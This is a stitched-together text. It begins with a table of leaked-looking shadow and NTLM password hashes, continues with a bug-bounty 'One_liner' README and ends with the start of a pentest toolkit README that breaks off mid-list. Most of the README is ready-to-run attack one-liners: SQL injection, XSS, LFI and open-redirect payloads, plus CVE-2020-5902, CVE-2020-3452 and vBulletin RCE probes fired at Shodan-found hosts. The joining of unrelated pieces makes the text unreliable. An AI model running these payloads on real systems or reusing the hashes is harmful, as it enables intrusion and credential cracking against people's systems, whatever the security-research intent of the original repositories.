`root:$6$qAoeosiW$fsOy8H/VKux.9K0T3Ww2D3FPNlO5LAaFytx/6t69Q7LPDSS/nNiP4xzq0Qab.Iz3uy5fYdH3Aw/K5v3ZMhRRH0:16756:0:99999:7:::` | | 75. | `root:$6$sZyJlUny$OcHP9bd8dO9rAKAlryxUjnUbH0dxgZc2uCePZMUUKSeIdALUulXLQ1iDjoEQpvZI.HTHOHUkCR.m39Xrt3mm91:17097:0:99999:7:::` | | 76. | `sarah:$6$DoSO7Ycr$2GtM5.8Lfx9Sw8X1fDMF.7zWDoVoy1892nyp0iFsqh5CfmtEROtxmejvQxu0N/8D7X8PQAGKYGl.gUb6/cG210:18010:0:99999:7:::` | | 77. | `scriptmanager:$6$WahhM57B$rOHkWDRQpds96uWXkRCzA6b5L3wOorpe4uwn5U32yKRsMWDwKAm.RF6T81Ki/MOyo.dJ0B8Xm5/wOrLk35Nqd0:17504:0:99999:7:::` | | 78. | `service:$1$cwdqim5m$bw71JTFHNWLjDTmYTNN9j/:17239:0:99999:7:::` | | 79. | `setup:$6$PR5zOqWk$3MKXMgf6.4bLlznh0R87RB4qaOAcGhbE0Cs8xtUqVPHP8x0553/6aMZnfsZOWKXL0DOqUcVRkfCQN8DvjdZNc1:17086:0:99999:7:::` | | 80. | `shelly:$6$aYLAoDIC$CJ8f8WSCT6GYmbx7x8z5RfrbTG5mpDkkJkLW097hoiEw3tqei2cE7EcUTYdJTVMSa3PALZeBHjhiFR8Ba5jzf0:17431:0:99999:7:::` | | 81. | `smeagol:$6$vu8Pfezj$6ldY35ytL8yRd.Gp947FnW3t/WrMZXIL7sqTQS4wuSKeAiYeoYCy7yfS2rBpAPvFCPuo73phXmpOoLsg5REXz.:16695:0:99999:7:::` | | 82. | `SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:8ed3993efb4e6476e4f75caebeca93e6:::` | | 83. | `susan:$6$5oSmml7K$0joeavcuzw4qxDJ2LsD1ablUIrFhycVoIXL3rxN/3q2lVpQOKLufta5tqMRIh30Gb32IBp5yZ7XvBR6uX9/SR/:17721:0:99999:7:::` | | 84. | `sys:$1$NsRwcGHl$euHtoVjd59CxMcIasiTw/.:17239:0:99999:7:::` | | 85. | `togie:$6$dvOTOc6x$jpt1MVPeBsVlfkhVXl3sv21x2Ls2qle8ouv/JMdR6yNpt2nHHahrh0cyT.8PfVcNqlrAHYFkK2WYdSbxQ4Ivu1:17392:0:99999:7:::` | | 86. | `tom:$6$ptD/.gN.$n.B/5dODEQFteBwg75Ip9leeaaXSMesGbfZzoVHpZihMHfbWu45UpVZTc6razK1JLZ6817ckZhAJF776Dg/ZJ0:17407:0:99999:7:::` | | 87. | `user1:$6$9iyn/lCu$UxlOZYhhFSAwJ8DPjlrjrl2Wv.Pz9DahMTfwpwlUC5ybyBGpuHToNIIjTqMLGSh0R2Ch4Ij5gkmP0eEH2RJhZ0:18050:0:99999:7:::` | | 88. | `user2:$6$7gVE7KgT$ud1VN8OwYCbFveieo4CJQIoMcEgcfKqa24ivRs/MNAmmPeudsz/p3QeCMHj8ULlvSufZmp3TodaWlIFSZCKG5.:18050:0:99999:7:::` | | 89. | `user3:$6$PaKeECW4$5yMn9UU4YByCj0LP4QWaGt/S1aG0Zs73EOJXh.Rl0ebjpmsBmuGUwTgBamqCCx7qZ0sWJOuzIqn.GM69aaWJO0:18051:0:99999:7:::` | | 90. | `user4:$6$0pxj6KPl$NA5S/2yN3TTJbPypEnsqYe1PrgbfccHntMggLdU2eM5/23dnosIpmD8sRJwI1PyDFgQXH52kYk.bzc6sAVSWm.:18051:0:99999:7:::` | | 91. | `user5:$6$wndyaxl9$cOEaymjMiRiljzzaSaFVXD7LFx2OwOxeonEdCW.GszLm77k0d5GpQZzJpcwvufmRndcYatr5ZQESdqbIsOb9n/:18051:0:99999:7:::` | | 92. | `user6:$6$Y9wYnrUW$ihpBL4g3GswEay/AqgrKzv1n8uKhWiBNlhdKm6DdX7WtDZcUbh/5w/tQELa3LtiyTFwsLsWXubsSCfzRcao1u/:18051:0:99999:7:::` | | 93. | `user7:$6$5RBuOGFi$eJrQ4/xf2z/3pG43UkkoE35Jb0BIl7AW/umj1Xa7eykmalVKiRKJ4w3vFEOEOtYinnkIRa.89dXtGQXdH.Rdy0:18052:0:99999:7:::` | | 94. | `user8:$6$fdtulQ7i$G9THW4j6kUy4bXlf7C/0XQtntw123LRVRfIkJ6akDLPHIqB5PJLD4AEyz7wXsEhMc2XC4CqiTxATfb20xWaXP.:18052:0:99999:7:::` | | 95. | `user:$6$gLVDPSY5$CGHDuEBpkC90vX2xFD9NeJC0O9XfhVj9oFVvL8XbTRpBnt/7WJFpADj0zboPTKTqPbOHafZGUd/exj4OZ1Frc/:15585:0:99999:7:::` | | 96. | `veronica:$6$ud4650Og$j9dN4Xh6nHTDUQ5LpnrUzl6FdRiapcGvjg0JU2/Wx.G5Q.PFtbv.sa4OJyNnzTVsFEMmgnEZQV1nxGFiy56zS/:17033:0:99999:7:::` | | 97. | `vulnix:$6$tMOyhDF2$gExhASDVWJqHYn00.A8XLJb.DvE7bdD6NffAno3iY5zEkJwZ4yDTGMrhdVbkMXV1dlBT00DoGFR7oXbtDi3lQ0:15585:0:99999:7:::` | | 98. | `wpadmin:$6$FtTN/YPC$iidNFmRVpQ1p2kkfoOZ6OzNPqR95DQ/7G10aze2CA2W3ik/sHHyEPaNNY57tMvRDU0/Rs62FEimiKXD2VgEYC1:17096:0:99999:7:::` | | 99. | `www-data:$6$SYixzIan$P3cvyztSwA1lmILF3kpKcqZpYSDONYwMwplB62RWu1RklKqIGCX1zleXuVwzxjLcpU6bhiW9N03AWkzVUZhms.:17264:0:99999:7:::` |
## What is One_liner Project ? The main goal is to share tips from some well-known bug hunters. Using recon methodology, we can find subdomains, APIs, and tokens that are already exploitable, so we can report them. We wish to influence Onelinetips and explain the commands, for the better understanding of new hunters. <p align="center"> <a href="https://twitter.com/harshinsecurity"> <img src="https://img.shields.io/twitter/follow/harshinsecurity?style=social"> </a> <a href="https://github.com/harshinsecurity?tab=followers"> <img alt="GitHub followers" src="https://img.shields.io/github/followers/harshinsecurity?label=Follow&style=social"> </a> </p> ## Special thanks - [@Stokfredrik](https://twitter.com/stokfredrik) - [@Jhaddix](https://twitter.com/Jhaddix) - [@pdiscoveryio](https://twitter.com/pdiscoveryio) - [@TomNomNom](https://twitter.com/TomNomNom) - [@NahamSec](https://twitter.com/NahamSec) ## Scripts that need to be installed To run the project, you will need to install the following programs: - [Anew](https://github.com/tomnomnom/anew) - [Qsreplace](https://github.com/tomnomnom/qsreplace) - [Subfinder](https://github.com/projectdiscovery/subfinder) - [Gospider](https://github.com/jaeles-project/gospider) - [Github-Search](https://github.com/gwen001/github-search) - [Amass](https://github.com/OWASP/Amass) - [Hakrawler](https://github.com/hakluke/hakrawler) - [Gargs](https://github.com/brentp/gargs) ### Search Asn Amass - [Explaining command](https://bit.ly/2EMooDB) Amass intel will search the organization "PayPal" from a database of ASNs at a faster-than-default rate. It will then take these ASN numbers and scan the complete ASN/IP space for all TLD's in that IP space (paypal.com, paypal.co.id, paypal.me). ```bash amass intel -org paypal -max-dns-queries 2500 | awk -F, '{print $1}' ORS=',' | sed 's/,$//' | xargs -P3 -I@ -d ',' amass intel -asn @ -max-dns-queries 2500'' ``` ### Using chaos search js - [Explaining command](https://bit.ly/32vfRg7) Choas is an API by Project Discovery that discovers subdomains. Here we are querying thier API for all known subdoains of "att.com". We are then using httpx to find which of those domains is live and hosts an HTTP or HTTPs site. We then pass those URLs to GoSpider to visit them and crawl them for all links (javascript, endpoints, etc). We then grep to find all the JS files. We pipe this all through anew so we see the output iterativlely (faster) and grep for "(http|https)://att.com" to make sure we dont recieve output for domains that are not "att.com". ```bash chaos -d att.com | httpx -silent | xargs -I@ -P20 sh -c 'gospider -a -s "@" -d 2' | grep -Eo "(http|https)://[^/"].*.js+" | sed "s#] ``` ### Search Subdomain using Gospider - [Explaining command](https://bit.ly/2QtG9do) ```bash gospider -d 0 -s "https://site.com" -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew ``` ### Using gospider to chaos - [Explaining command](https://bit.ly/2D4vW3W) ```bash chaos -d paypal.com -bbq -filter-wildcard -http-url | xargs -I@ -P5 sh -c 'gospider -a -s "@" -d 3' ``` ### Using recon.dev and gospider crawler subdomains - [Explaining command](https://bit.ly/32pPRDa) ```bash curl "https://recon.dev/api/search?key=apiKEY&domain=paypal.com" |jq -r '.[].rawDomains[]' | sed 's/ //g' | anew |httpx -silent | xargs -I@ gospider -d 0 -s @ -c 5 -t 100 -d 5 --blacklist jpg,jpeg,gif,css,tif,tiff,png,ttf,woff,woff2,ico,pdf,svg,txt | grep -Eo '(http|https)://[^/"]+' | anew' ``` ### PSQL - search subdomain using cert.sh - [Explaining command](https://bit.ly/32rMA6e) ```bash psql -A -F , -f querycrt -h http://crt.sh -p 5432 -U guest certwatch 2>/dev/null | tr ', ' '\n' | grep twitch | anew' ``` ### Search subdomains using Github and httpx - [Github-search](https://github.com/gwen001/github-search) - Using python3 to search subdomains, httpx filter hosts by up status-code response (200) ```python ./github-subdomains.py -t APYKEYGITHUB -d domaintosearch | httpx --title ``` ### Search SQLINJECTION using qsreplace search syntax error - [Explained comand](https://bit.ly/3hxFWS2) ```bash grep "=" .txt| qsreplace "' OR '1" | httpx -silent -store-response-dir output -threads 100 | grep -q -rn "syntax\|mysql" output 2>/dev/null && \printf "TARGET \033[0;32mCould Be Exploitable\e[m\n" || printf "TARGET \033[0;31mNot Vulnerable\e[m\n" ``` ### Search subdomains using jldc - [Explained comand](https://bit.ly/2YBlEjm) ```bash curl -s "https://jldc.me/anubis/subdomains/att.com" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | anew ``` ### Search subdomains in assetfinder using hakrawler spider to search links in content responses - [Explained comand](https://bit.ly/3hxRvZw) ```bash assetfinder -subs-only http://tesla.com -silent | httpx -timeout 3 -threads 300 --follow-redirects -silent | xargs -I% -P10 sh -c 'hakrawler -plain -linkfinder -depth 5 -url %' | grep "tesla" ``` ### Search subdomains in cert.sh - [Explained comand](https://bit.ly/2QrvMXl) ```bash curl -s "https://crt.sh/?q=%25.att.com&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | httpx -title -silent | anew ``` ### Search subdomains in cert.sh assetfinder to search in link /.git/HEAD - [Explained comand](https://bit.ly/3lhFcTH) ```bash curl -s "https://crt.sh/?q=%25.tesla.com&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | sed 's#$#/.git/HEAD#g' | httpx -silent -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ```bash curl -s "https://crt.sh/?q=%25.enjoei.com.br&output=json" | jq -r '.[].name_value' | assetfinder -subs-only | httpx -silent -path /.git/HEAD -content-length -status-code 301,302 -timeout 3 -retries 0 -ports 80,8080,443 -threads 500 -title | anew ``` ### Collect js files from hosts up by gospider - [Explained comand](https://bit.ly/3aWIwyI) ```bash xargs -P 500 -a pay -I@ sh -c 'nc -w1 -z -v @ 443 2>/dev/null && echo @' | xargs -I@ -P10 sh -c 'gospider -a -s "https://@" -d 2 | grep -Eo "(http|https)://[^/\"].*\.js+" | sed "s#\] \- #\n#g" | anew' ``` ### Subdomain search Bufferover resolving domain to httpx - [Explained comand](https://bit.ly/3lno9j0) ```bash curl -s https://dns.bufferover.run/dns?q=.sony.com |jq -r .FDNS_A[] | sed -s 's/,/\n/g' | httpx -silent | anew ``` ### Using gargs to gospider search with parallel proccess - [Gargs](https://github.com/brentp/gargs) - [Explained comand](https://bit.ly/2EHj1FD) ```bash httpx -ports 80,443,8009,8080,8081,8090,8180,8443 -l domain -timeout 5 -threads 200 --follow-redirects -silent | gargs -p 3 'gospider -m 5 --blacklist pdf -t 2 -c 300 -d 5 -a -s {}' | anew stepOne ``` ### Injection xss using qsreplace to urls filter to gospider - [Explained comand](https://bit.ly/3joryw9) ```bash gospider -S domain.txt -t 3 -c 100 | tr " " "\n" | grep -v ".js" | grep "https://" | grep "=" | qsreplace '%22><svg%20onload=confirm(1);>' ``` ### Extract URL's to apk - [Explained comand](https://bit.ly/2QzXwJr) ```bash apktool d app.apk -o uberApk;grep -Phro "(https?://)[\w\.-/]+[\"'\`]" uberApk/ | sed 's#"##g' | anew | grep -v "w3\|android\|github\|schemas.android\|google\|goo.gl" ``` ### Chaos to Gospider - [Explained comand](https://bit.ly/3gFJbpB) ```bash chaos -d att.com -o att -silent | httpx -silent | xargs -P100 -I@ gospider -c 30 -t 15 -d 4 -a -H "x-forwarded-for: 127.0.0.1" -H "User-Agent: Mozilla/5.0 (Linux; U; Android 2.2) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1" -s @ ``` ### Checking invalid certificate - [Real script](https://bit.ly/2DhAwMo) - [Script King](https://bit.ly/34Z0kIH) ```bash xargs -a domain -P1000 -I@ sh -c 'bash cert.sh @ 2> /dev/null' | grep "EXPIRED" | awk '/domain/{print $5}' | httpx ``` ### Using shodan & Nuclei - [Explained comand](https://bit.ly/3jslKle) ```bash shodan domain DOMAIN TO BOUNTY | awk '{print $3}' | httpx -silent | nuclei -t /nuclei-templates/ ``` ### Open Redirect test using gf. - [Explained comand](https://bit.ly/3hL263x) ```bash echo "domain" | waybackurls | httpx -silent -timeout 2 -threads 100 | gf redirect | anew ``` ### Using shodan to jaeles "How did I find a critical today? well as i said it was very simple, using shodan and jaeles". - [Explained comand](https://bit.ly/2QQfY0l) ```bash shodan domain domain| awk '{print $3}'| httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using Chaos to jaeles "How did I find a critical today?. - [Explained comand](https://bit.ly/2YXiK8N) ```bash chaos -d domain | httpx -silent | anew | xargs -I@ jaeles scan -c 100 -s /jaeles-signatures/ -u @ ``` ### Using shodan to jaeles - [Explained comand](https://bit.ly/2Dkmycu) ```bash domain="domaintotest";shodan domain $domain | awk -v domain="$domain" '{print $1"."domain}'| httpx -threads 300 | anew shodanHostsUp | xargs -I@ -P3 sh -c 'jaeles -c 300 scan -s jaeles-signatures/ -u @'| anew JaelesShodanHosts ``` ### Search to files using assetfinder and ffuf - [Explained comand](https://bit.ly/2Go3Ba4) ```bash assetfinder att.com | sed 's#*.# #g' | httpx -silent -threads 10 | xargs -I@ sh -c 'ffuf -w path.txt -u @/FUZZ -mc 200 -H "Content-Type: application/json" -t 150 -H "X-Forwarded-For:127.0.0.1"' ``` ### Local File Inclusion > @dwisiswant0 ```bash gau HOST | gf lfi | qsreplace "/etc/passwd" | xargs -I% -P 25 sh -c 'curl -s "%" 2>&1 | grep -q "root:x" && echo "VULN! %"' ``` ### Open-redirect > @dwisiswant0 ```bash export LHOST="URL"; gau $1 | gf redirect | qsreplace "$LHOST" | xargs -I % -P 25 sh -c 'curl -Is "%" 2>&1 | grep -q "Location: $LHOST" && echo "VULN! %"' ``` > @N3T_hunt3r ```bash cat URLS.txt | gf url | tee url-redirect.txt && cat url-redirect.txt | parallel -j 10 curl --proxy http://127.0.0.1:8080 -sk > /dev/null ``` ### XSS > @cihanmehmet ```bash gospider -S URLS.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe | tee OUT.txt ``` > @fanimalikhack ```bash waybackurls HOST | gf xss | sed 's/=.*/=/' | sort -u | tee FILE.txt && cat FILE.txt | dalfox -b YOURS.xss.ht pipe > OUT.txt ``` > @oliverrickfors ```bash cat HOSTS.txt | getJS | httpx --match-regex "addEventListener\((?:'|\")message(?:'|\")" ``` ### Prototype Pollution > @R0X4R ```bash subfinder -d HOST -all -silent | httpx -silent -threads 300 | anew -q FILE.txt && sed 's/$/\/?__proto__[testparam]=exploit\//' FILE.txt | page-fetch -j 'window.testparam == "exploit"? "[VULNERABLE]" : "[NOT VULNERABLE]"' | sed "s/(//g" | sed "s/)//g" | sed "s/JS //g" | grep "VULNERABLE" ``` ### CVE-2020-5902 > @Madrobot_ ```bash shodan search http.favicon.hash:-335242539 "3992" --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl --silent --path-as-is --insecure "https://$host/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd" | grep -q root && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done ``` ### CVE-2020-3452 > @vict0ni ```bash while read LINE; do curl -s -k "https://$LINE/+CSCOT+/translation-table?type=mst&textdomain=/%2bCSCOE%2b/portal_inc.lua&default-language&lang=../" | head | grep -q "Cisco" && echo -e "[${GREEN}VULNERABLE${NC}] $LINE" || echo -e "[${RED}NOT VULNERABLE${NC}] $LINE"; done < HOSTS.txt ``` ### CVE-2022-0378 > @7h3h4ckv157 ```bash cat URLS.txt | while read h do; do curl -sk "$h/module/?module=admin%2Fmodules%2Fmanage&id=test%22+onmousemove%3dalert(1)+xx=%22test&from_url=x"|grep -qs "onmouse" && echo "$h: VULNERABLE"; done ``` ### vBulletin 5.6.2 - 'widget_tabbedContainer_tab_panel' Remote Code Execution > @Madrobot_ ```bash shodan search http.favicon.hash:-601665621 --fields ip_str,port --separator " " | awk '{print $1":"$2}' | while read host do ;do curl -s http://$host/ajax/render/widget_tabbedcontainer_tab_panel -d 'subWidgets[0][template]=widget_php&subWidgets[0][config][code]=phpinfo();' | grep -q phpinfo && \printf "$host \033[0;31mVulnerable\n" || printf "$host \033[0;32mNot Vulnerable\n";done; ``` ### Find JavaScript Files > @D0cK3rG33k ```bash assetfinder --subs-only HOST | gau | egrep -v '(.css|.png|.jpeg|.jpg|.svg|.gif|.wolf)' | while read url; do vars=$(curl -s $url | grep -Eo "var [a-zA-Zo-9_]+" | sed -e 's, 'var','"$url"?',g' -e 's/ //g' | grep -v '.js' | sed 's/.*/&=xss/g'):echo -e "\e[1;33m$url\n" "\e[1;32m$vars"; done ``` ### Extract Endpoints from JavaScript > @renniepak ```bash cat FILE.js | grep -oh "\"\/[a-zA-Z0-9_/?=&]*\"" | sed -e 's/^"//' -e 's/"$//' | sort -u ``` ### Get CIDR & Org Information from Target Lists > @steve_mcilwain ```bash for HOST in $(cat HOSTS.txt);do echo $(for ip in $(dig a $HOST +short); do whois $ip | grep -e "CIDR\|Organization" | tr -s " " | paste - -; d one | uniq); done ``` ### Get Subdomains from RapidDNS.io > @andirrahmani1 ```bash curl -s "https://rapiddns.io/subdomain/$1?full=1#result" | grep "<td><a" | cut -d '"' -f 2 | grep http | cut -d '/' -f3 | sed 's/#results//g' | sort -u ``` ### Get Subdomains from BufferOver.run > @\_ayoubfathi\_ ```bash curl -s https://dns.bufferover.run/dns?q=.HOST.com | jq -r .FDNS_A[] | cut -d',' -f2 | sort -u ``` > @AnubhavSingh_ ```bash export domain="HOST"; curl "https://tls.bufferover.run/dns?q=$domain" | jq -r .Results'[]' | rev | cut -d ',' -f1 | rev | sort -u | grep "\.$domain" ``` ### Get Subdomains from Riddler.io > @pikpikcu ```bash curl -s "https://riddler.io/search/exportcsv?q=pld:HOST" | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u ``` ### Get Subdomains from VirusTotal > @pikpikcu ```bash curl -s "https://www.virustotal.com/ui/domains/HOST/subdomains?limit=40" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u ``` ### Get Subdomain with cyberxplore > @pikpikcu ``` curl https://subbuster.cyberxplore.com/api/find?domain=HOST -s | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" ``` ### Get Subdomains from CertSpotter > @caryhooper ```bash curl -s "https://certspotter.com/api/v1/issuances?domain=HOST&include_subdomains=true&expand=dns_names" | jq .[].dns_names | grep -Po "(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u ``` ### Get Subdomains from Archive > @pikpikcu ```bash curl -s "http://web.archive.org/cdx/search/cdx?url=*.HOST/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u ``` ### Get Subdomains from JLDC > @pikpikcu ```bash curl -s "https://jldc.me/anubis/subdomains/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | sort -u ``` ### Get Subdomains from securitytrails > @pikpikcu ```bash curl -s "https://securitytrails.com/list/apex_domain/HOST" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ``` ### Bruteforcing Subdomain using DNS Over > @pikpikcu ``` while read sub; do echo "https://dns.google.com/resolve?name=$sub.HOST&type=A&cd=true" | parallel -j100 -q curl -s -L --silent | grep -Po '[{\[]{1}([,:{}\[\]0-9.\-+Eaeflnr-u \n\r\t]|".*?")+[}\]]{1}' | jq | grep "name" | grep -Po "((http|https):\/\/)?(([\w.-]*)\.([\w]*)\.([A-z]))\w+" | grep ".HOST" | sort -u ; done < FILE.txt ``` ### Get Subdomains With sonar.omnisint.io > @pikpikcu ``` curl --silent https://sonar.omnisint.io/subdomains/HOST | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u ``` ### Get Subdomains With synapsint.com > @pikpikcu ``` curl --silent -X POST https://synapsint.com/report.php -d "name=https%3A%2F%2FHOST" | grep -oE "[a-zA-Z0-9._-]+\.HOST" | sort -u ``` ### Get Subdomains from crt.sh > @vict0ni ```bash curl -s "https://crt.sh/?q=%25.HOST&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u ``` ### Sort & Tested Domains from Recon.dev > @stokfedrik ```bash curl "https://recon.dev/api/search?key=apikey&domain=HOST" |jq -r '.[].rawDomains[]' | sed 's/ //g' | sort -u | httpx -silent ``` ### Subdomain Bruteforcer with FFUF > @GochaOqradze ```bash ffuf -u https://FUZZ.HOST -w FILE.txt -v | grep "| URL |" | awk '{print $4}' ``` ### Find Allocated IP Ranges for ASN from IP Address > wains.be ```bash whois -h whois.radb.net -i origin -T route $(whois -h whois.radb.net IP | grep origin: | awk '{print $NF}' | head -1) | grep -w "route:" | awk '{print $NF}' | sort -n ``` ### Extract IPs from a File > @emenalf ```bash grep -E -o '(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.(25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)' file.txt ``` ### Ports Scan without CloudFlare > @dwisiswant0 ```bash subfinder -silent -d HOST | filter-resolved | cf-check | sort -u | naabu -rate 40000 -silent -verify | httprobe ``` ### Create Custom Wordlists > @tomnomnom ```bash gau HOST | unfurl -u keys | tee -a FILE1.txt; gau HOST | unfurl -u paths | tee -a FILE2.txt; sed 's#/#\n#g' FILE2.txt | sort -u | tee -a FILE1.txt | sort -u; rm FILE2.txt | sed -i -e 's/\.css\|\.png\|\.jpeg\|\.jpg\|\.svg\|\.gif\|\.wolf\|\.bmp//g' FILE1.txt ``` ```bash cat HOSTS.txt | httprobe | xargs curl | tok | tr '[:upper:]' '[:lower:]' | sort -u | tee -a FILE.txt ``` ### Extracts Juicy Informations > @Prial Islam Khan ```bash for sub in $(cat HOSTS.txt); do gron "https://otx.alienvault.com/otxapi/indicator/hostname/url_list/$sub?limit=100&page=1" | grep "\burl\b" | gron --ungron | jq | egrep -wi 'url' | awk '{print $2}' | sed 's/"//g'| sort -u | tee -a OUT.txt ;done ``` ### Find Subdomains TakeOver > @hahwul ```bash subfinder -d HOST >> FILE; assetfinder --subs-only HOST >> FILE; amass enum -norecursive -noalts -d HOST >> FILE; subjack -w FILE -t 100 -timeout 30 -ssl -c $GOPATH/src/github.com/haccer/subjack/fingerprints.json -v 3 >> takeover ; ``` ### Dump Custom URLs from ParamSpider > @hahwul ```bash cat HOSTS.txt | xargs -I % python3 paramspider.py -l high -o ./OUT/% -d %; ``` ### URLs Probing with cURL + Parallel > @akita_zen ```bash cat HOSTS.txt | parallel -j50 -q curl -w 'Status:%{http_code}\t Size:%{size_download}\t %{url_effective}\n' -o /dev/null -sk ``` ### Dump In-scope Assets from `chaos-bugbounty-list` > @dwisiswant0 ```bash curl -sL https://github.com/projectdiscovery/public-bugbounty-programs/raw/master/chaos-bugbounty-list.json | jq -r '.programs[].domains | to_entries | .[].value' ``` ### Dump In-scope Assets from `bounty-targets-data` > @dwisiswant0 #### HackerOne Programs ```bash curl -sL https://github.com/arkadiyt/bounty-targets-data/blob/master/data/hackerone_data.json?raw=true | jq -r '.[].targets.in_scope[] | [.asset_identifier, .asset_type] | @tsv' ``` #### BugCrowd Programs ```bash curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/bugcrowd_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv' ``` #### Intigriti Programs ```bash curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/intigriti_data.json | jq -r '.[].targets.in_scope[] | [.endpoint, .type] | @tsv' ``` #### YesWeHack Programs ```bash curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/yeswehack_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv' ``` #### HackenProof Programs ```bash curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/hackenproof_data.json | jq -r '.[].targets.in_scope[] | [.target, .type, .instruction] | @tsv' ``` #### Federacy Programs ```bash curl -sL https://github.com/arkadiyt/bounty-targets-data/raw/master/data/federacy_data.json | jq -r '.[].targets.in_scope[] | [.target, .type] | @tsv' ``` ### Dump URLs from sitemap.xml > @healthyoutlet ```bash curl -s http://HOST/sitemap.xml | xmllint --format - | grep -e 'loc' | sed -r 's|</?loc>||g' ``` ### Pure Bash Linkfinder > @ntrzz ```bash curl -s $1 | grep -Eo "(http|https)://[a-zA-Z0-9./?=_-]*" | sort | uniq | grep ".js" > FILE.txt; while IFS= read link; do python linkfinder.py -i "$link" -o cli; done < FILE.txt | grep $2 | grep -v $3 | sort -n | uniq; rm -rf FILE.txt ``` ### Extract Endpoints from swagger.json > @zer0pwn ```bash curl -s https://HOST/v2/swagger.json | jq '.paths | keys[]' ``` ### CORS Misconfiguration > @manas_hunter ```bash site="URL"; gau "$site" | while read url; do target=$(curl -sIH "Origin: https://evil.com" -X GET $url) | if grep 'https://evil.com'; then [Potentional CORS Found] echo $url; else echo Nothing on "$url"; fi; done ``` ### Find Hidden Servers and/or Admin Panels > @rez0__ ```bash ffuf -c -u URL -H "Host: FUZZ" -w FILE.txt ``` ### Recon Using api.recon.dev > @z0idsec ```bash curl -s -w "\n%{http_code}" https://api.recon.dev/search?domain=HOST | jg .[].domain ``` ### Find Live Host/Domain/Assets > @_YashGoti_ ```bash subfinder -d HOST -silent | httpx -silent -follow-redirects -mc 200 | cut -d '/' -f3 | sort -u ``` ### XSS without gf > @HacktifyS ```bash waybackurls HOST | grep '=' | qsreplace '"><script>alert(1)</script>' | while read host do ; do curl -sk --path-as-is "$host" | grep -qs "<script>alert(1)</script>" && echo "$host is vulnerable"; done ``` ### Get Subdomains from IPs > @laughface809 ```bash python3 hosthunter.py HOSTS.txt > OUT.txt ``` ### Gather Domains from Content-Security-Policy > @geeknik ```bash curl -vs URL --stderr - | awk '/^content-security-policy:/' | grep -Eo "[a-zA-Z0-9./?=_-]*" | sed -e '/\./!d' -e '/[^A-Za-z0-9._-]/d' -e 's/^\.//' | sort -u ``` ### Nmap IP:PORT Parser Piped to HTTPX > @dwisiswant0 ```bash nmap -v0 HOST -oX /dev/stdout | jc --xml -p | jq -r '.nmaprun.host | (.address["@addr"] + ":" + .ports.port[]["@portid"])' | httpx --silent ```
Pull requests welcome. # Preparing your environment Clone the following repositories: * https://github.com/superkojiman/onetwopunch - Wrapper around nmap/unicorn scanner * https://github.com/AutoRecon/AutoRecon - Another recon script * https://github.com/codingo/Reconnoitre - Recon script with suggested follow-up commands * https://github.com/jivoi/pentest - Fully automated recon * https://github.com/danielmiessler/SecLists - Wordlists * https://github.com/mthbernardes/rsg - Reverse shell generator * https://github.com/rebootuser/LinEnum - Linux privesc enumeration * https://github.com/mzet-/linux-exploit-suggester - Linux privesc enumeration * https://github.com/TH3xACE/SUDO_KILLER - Bash script to search for `sudo -l` misconfigs * https://github.com/M4ximuss/Powerless - Windows privesc enumeration (non-powershell) * https://github.com/PowerShellMafia/PowerSploit - Windows Powershell-based privesc * https://github.com/411Hall/JAWS - Windows privesc enumeration (powershell) * https://github.com/absolomb/WindowsEnum - Windows privesc enumeration (powershell) * https://github.com/rasta-mouse/Sherlock - Windows kernel exploit checker * https://github.com/ankh2054/windows-pentest - Windows pentest scripts * https://github.com/SecWiki/windows-kernel-exploits - Precompiled Windows kernel exploits * https://github.com/51x/WHP - Collection of Windows attack tools and exploits * https://github.com/AusJock/Privilege-Escalation - Windows/Linux kernel exploits * https://github.com/3ndG4me/AutoBlue-MS17-010 - MS17-010 for multiple systems * https://github.com/GDSSecurity/Windows-Exploit-Suggester - Script that parses `systeminfo` output to suggest exploits Or as a list of commands: ``` git clone --depth 1 https://github.com/superkojiman/onetwopunch.git git clone --depth 1 https://github.com/AutoRecon/AutoRecon.git git clone --depth 1 https://github.com/codingo/Reconnoitre.git git clone --depth 1 https://github.com/jivoi/pentest.git git clone --depth 1 https://github.com/danielmiessler/SecLists.git git clone --depth 1 https://github.com/mthbernardes/rsg.git git clone --depth 1 